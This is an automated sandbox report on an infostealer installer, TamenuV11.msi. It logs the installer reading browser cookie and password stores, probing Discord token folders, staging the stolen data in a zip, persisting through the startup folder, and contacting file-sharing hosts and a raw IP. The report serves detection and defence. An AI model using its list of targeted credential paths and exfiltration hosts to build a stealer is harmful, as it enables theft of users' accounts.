Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Browser Extensions VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Browser Extensions VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Passwords\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Browser Extensions VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Discord Tokens VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Wallets VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Important Files VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Passwords\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Passwords\Microsoft_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation

Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

Code function: 7_2_00402D6B EntryPoint,GetVersion,GetCommandLineA,

7_2_00402D6B

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal

Tries to steal communication platform credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	file Attributes Queried: C:\Users\user\AppData\Local\Discord	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	file Attributes Queried: C:\Users\user\AppData\Local\DiscordCanary	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	file Attributes Queried: C:\Users\user\AppData\Local\DiscordPTB	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	file Attributes Queried: C:\Users\user\AppData\Local\DiscordDevelopment	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	file Attributes Queried: C:\Users\user\AppData\Local\Discord
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	file Attributes Queried: C:\Users\user\AppData\Local\DiscordCanary
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	file Attributes Queried: C:\Users\user\AppData\Local\DiscordPTB
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	file Attributes Queried: C:\Users\user\AppData\Local\DiscordDevelopment

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Directory queried: C:\Users\user\Documents			Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Directory queried: C:\Users\user\Documents

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Windows Management Instrumentation	1 Windows Service	1 Windows Service	21 Masquerading	1 OS Credential Dumping	2 Process Discovery	Remote Services	1 Email Collection	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	2 Registry Run Keys / Startup Folder	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	1 DLL Side-Loading	2 Registry Run Keys / Startup Folder	11 Process Injection	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	11 Data from Local System	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	NTDS	12 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	25 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TamenuV11.msi	0%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Programs\Setup\d3dcompiler_47.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Programs\Setup\d3dcompiler_47.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Programs\Setup\ffmpeg.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Programs\Setup\ffmpeg.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Programs\Setup\libEGL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Programs\Setup\libEGL.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Programs\Setup\libGLESv2.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Programs\Setup\vk_swiftshader.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Programs\Setup\vulkan-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\76dc3e7b-42c7-418c-a7d9-9ee8c15a4191.tmp.node	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8dc2e56e-3a34-45cd-8db1-cde7ca3b7178.tmp.node	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\a72c96d9-4557-4a69-8de5-5e32a2c87665.tmp.node	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\c149297e-6f19-4d06-8ddb-7807f8b84ab1.tmp.node	4%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
chrome.cloudflare-dns.com	0%	Virustotal	Browse
file.io	3%	Virustotal	Browse
discord.com	0%	Virustotal	Browse
oshi.at	3%	Virustotal	Browse
tempfile.me	0%	Virustotal	Browse
api.gofile.io	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://support.google.com/chrome/answer/6098869	0%	URL Reputation	safe
https://chrome.google.com/webstore/category/extensions	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=no&category=theme81https://myactivity.google.com/myactivity/?u	0%	Avira URL Cloud	safe
https://chromeenterprise.google/policies/#BrowserSwitcherEnabled	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=vi&category=theme81https://myactivity.google.com/myactivity/?u	0%	Avira URL Cloud	safe
https://www.google.com/chrome/privacy/eula_text.htmlA&judaGestionat	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=vi&category=theme81https://myactivity.google.com/myactivity/?u	0%	Virustotal		Browse
https://support.google.com/chromebook?p=app_intent	0%	Avira URL Cloud	safe
https://www.google.com/chrome/privacy/eula_text.htmlA&judaGestionat	0%	Virustotal		Browse
https://support.google.com/chromebook?p=app_intent	0%	Virustotal		Browse
https://www.google.com/chrome/privacy/eula_text.html	1%	Virustotal		Browse
https://passwords.google.comT	0%	Avira URL Cloud	safe
https://chromeenterprise.google/policies/#BrowserSwitcherEnabled	0%	Virustotal		Browse
https://www.google.com/chrome/privacy/eula_text.html	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=ca&category=theme81https://myactivity.google.com/myactivity/?u	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=sv&category=theme81https://myactivity.google.com/myactivity/?u	0%	Avira URL Cloud	safe
https://www.google.com/chrome/privacy/eula_text.htmlT&r	0%	Avira URL Cloud	safe
https://www.google.com/chrome/privacy/eula_text.htmlH&jelpAdministreres	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore/category/extensions	0%	Virustotal		Browse
https://chrome.google.com/webstore?hl=no&category=theme81https://myactivity.google.com/myactivity/?u	0%	Virustotal		Browse
https://chrome.google.com/webstore?hl=filCtrl$1	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=ca&category=theme81https://myactivity.google.com/myactivity/?u	0%	Virustotal		Browse
https://chrome.google.com/webstore?hl=noCtrl$1	0%	Avira URL Cloud	safe
https://www.google.com/chrome/privacy/eula_text.htmlT&r	1%	Virustotal		Browse
https://passwords.google.comCompte	0%	Avira URL Cloud	safe
https://photos.google.com/settings?referrer=CHROME_NTP	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=sv&category=theme81https://myactivity.google.com/myactivity/?u	0%	Virustotal		Browse
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl	0%	Avira URL Cloud	safe
https://myactivity.google.com/	0%	Avira URL Cloud	safe
https://passwords.google.comGoogle-kontoSparade	0%	Avira URL Cloud	safe
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl	0%	Virustotal		Browse
https://www.google.com/chrome/privacy/eula_text.htmlH&j	0%	Avira URL Cloud	safe
https://www.google.com/chrome/privacy/eula_text.htmlH&jelpAdministreres	0%	Virustotal		Browse
https://www.google.com/chrome/privacy/eula_text.htmlT&ulongPinapamahalaan	0%	Avira URL Cloud	safe
https://www.google.com/chrome/privacy/eula_text.htmlH&j	0%	Virustotal		Browse
https://passwords.google.comGoogle-kontoLagrede	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=ukCtrl$1	0%	Avira URL Cloud	safe
http://92.246.138.20/storage	0%	Avira URL Cloud	safe
https://www.google.com/chrome/privacy/eula_text.htmlT&ulongPinapamahalaan	1%	Virustotal		Browse
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl	0%	Avira URL Cloud	safe
https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist	0%	Avira URL Cloud	safe
https://chromeenterprise.google/policies/#BrowserSwitcherUrlList	0%	Avira URL Cloud	safe
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl	0%	Virustotal		Browse
https://passwords.google.com	0%	Avira URL Cloud	safe
https://myactivity.google.com/	0%	Virustotal		Browse
https://photos.google.com/settings?referrer=CHROME_NTP	0%	Virustotal		Browse
https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist	0%	Virustotal		Browse
https://policies.google.com/	0%	Avira URL Cloud	safe
http://92.246.138.20/storage	10%	Virustotal		Browse
https://passwords.google.com	0%	Virustotal		Browse
https://chromeenterprise.google/policies/#BrowserSwitcherUrlList	0%	Virustotal		Browse
https://support.google.com/chrome/a/answer/9122284	0%	Avira URL Cloud	safe
https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22	0%	Avira URL Cloud	safe
https://policies.google.com/	0%	Virustotal		Browse
https://chrome.google.com/webstore?hl=viCtrl$1	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=caCtrl$1	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=uk&category=theme81https://myactivity.google.com/myactivity/?u	0%	Avira URL Cloud	safe
https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist	0%	Avira URL Cloud	safe
https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22	0%	Virustotal		Browse
https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	0%, Virustotal, Browse	unknown
file.io	45.55.107.24	true	false	3%, Virustotal, Browse	unknown
discord.com	162.159.135.232	true	false	0%, Virustotal, Browse	unknown
oshi.at	5.253.86.15	true	false	3%, Virustotal, Browse	unknown
zerostone.discloud.app	104.26.0.18	true	false		unknown
tempfile.me	193.37.215.73	true	false	0%, Virustotal, Browse	unknown
api.gofile.io	51.91.7.6	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://92.246.138.20/storage	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://chrome.google.com/webstore?hl=no&category=theme81https://myactivity.google.com/myactivity/?u	nb.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=vi&category=theme81https://myactivity.google.com/myactivity/?u	vi.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/chrome/privacy/eula_text.htmlA&judaGestionat	ca.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chromeenterprise.google/policies/#BrowserSwitcherEnabled	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore/category/extensions	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.google.com/chromebook?p=app_intent	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.google.com/chrome/answer/6098869	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr	false	URL Reputation: safe	unknown
https://passwords.google.comT	vi.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/privacy/eula_text.html	uk.pak.1.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=ca&category=theme81https://myactivity.google.com/myactivity/?u	ca.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=sv&category=theme81https://myactivity.google.com/myactivity/?u	sv.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/chrome/privacy/eula_text.htmlT&r	vi.pak.1.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/chrome/privacy/eula_text.htmlH&jelpAdministreres	nb.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=filCtrl$1	fil.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=noCtrl$1	nb.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://passwords.google.comCompte	ca.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://photos.google.com/settings?referrer=CHROME_NTP	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://myactivity.google.com/	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://passwords.google.comGoogle-kontoSparade	sv.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/privacy/eula_text.htmlH&j	sv.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/chrome/privacy/eula_text.htmlT&ulongPinapamahalaan	fil.pak.1.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://passwords.google.comGoogle-kontoLagrede	nb.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=ukCtrl$1	uk.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chromeenterprise.google/policies/#BrowserSwitcherUrlList	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://passwords.google.com	uk.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://policies.google.com/	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.google.com/chrome/a/answer/9122284	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=svCtrl$1	sv.pak.1.dr	false		unknown
https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=viCtrl$1	vi.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=caCtrl$1	ca.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=uk&category=theme81https://myactivity.google.com/myactivity/?u	uk.pak.1.dr	false	Avira URL Cloud: safe	unknown
https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist	sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
104.26.0.18	zerostone.discloud.app	United States	13335	CLOUDFLARENETUS	false
51.91.7.6	api.gofile.io	France	16276	OVHFR	false
193.37.215.73	tempfile.me	Bulgaria	44901	BELCLOUDBG	false
92.246.138.20	unknown	Russian Federation	8744	MEGAMAX-ASNizhnyNovgorodRU	false
45.55.107.24	file.io	United States	14061	DIGITALOCEAN-ASNUS	false
162.159.135.232	discord.com	United States	13335	CLOUDFLARENETUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
5.253.86.15	oshi.at	Cyprus	208046	HOSTSLICK-GERMANYNL	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483655
Start date and time:	2024-07-28 14:17:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	207
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TamenuV11.msi
Detection:	MAL
Classification:	mal72.spyw.winMSI@314/112@10/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 6 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:18:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.61.3	TamenuV5.2.exe	Get hash	malicious	Unknown	Browse
	TamenuV5.2.exe	Get hash	malicious	Unknown	Browse
	@Imperva.xml	Get hash	malicious	Coinhive, Xmrig	Browse
	APA Paper. currrent.Sp 19_0.pdf	Get hash	malicious	Unknown	Browse
	setup.exe	Get hash	malicious	MicroClip	Browse
	setup.exe	Get hash	malicious	MicroClip	Browse
	file.exe	Get hash	malicious	Babadeda	Browse
	file.exe	Get hash	malicious	Babadeda	Browse
	Modrinth_Installer.exe	Get hash	malicious	XWorm	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
104.26.0.18	http://f62f2f2ggfyg.discloud.app/discord?log=2026238840	Get hash	malicious	Unknown	Browse	f62f2f2ggfyg.discloud.app/discord?log=2026238840
104.26.0.18	http://www.pdfconvertercompare.com/main	Get hash	malicious	Unknown	Browse	www.pdfconvertercompare.com/main
51.91.7.6	Setup 3.0.0.msi	Get hash	malicious	Unknown	Browse
51.91.7.6	231210-10-Creal-33652f.exe	Get hash	malicious	Creal Stealer	Browse
92.246.138.20	LO-Installer64x.exe	Get hash	malicious	Unknown	Browse	92.246.138.20/decrypt
92.246.138.20	LO-Installer64x.exe	Get hash	malicious	Unknown	Browse	92.246.138.20/victim
45.55.107.24	Setup 3.0.0.msi	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002A_392.exe	Get hash	malicious	NovaSentinel	Browse
	SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe	Get hash	malicious	Akira Stealer	Browse
	SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe	Get hash	malicious	Unknown	Browse
	WolfLoader.exe	Get hash	malicious	Unknown	Browse
	WolfLoader.exe	Get hash	malicious	Unknown	Browse
	chromeUpdate.exe	Get hash	malicious	Unknown	Browse
	V93MfAY8Ru.exe	Get hash	malicious	Unknown	Browse
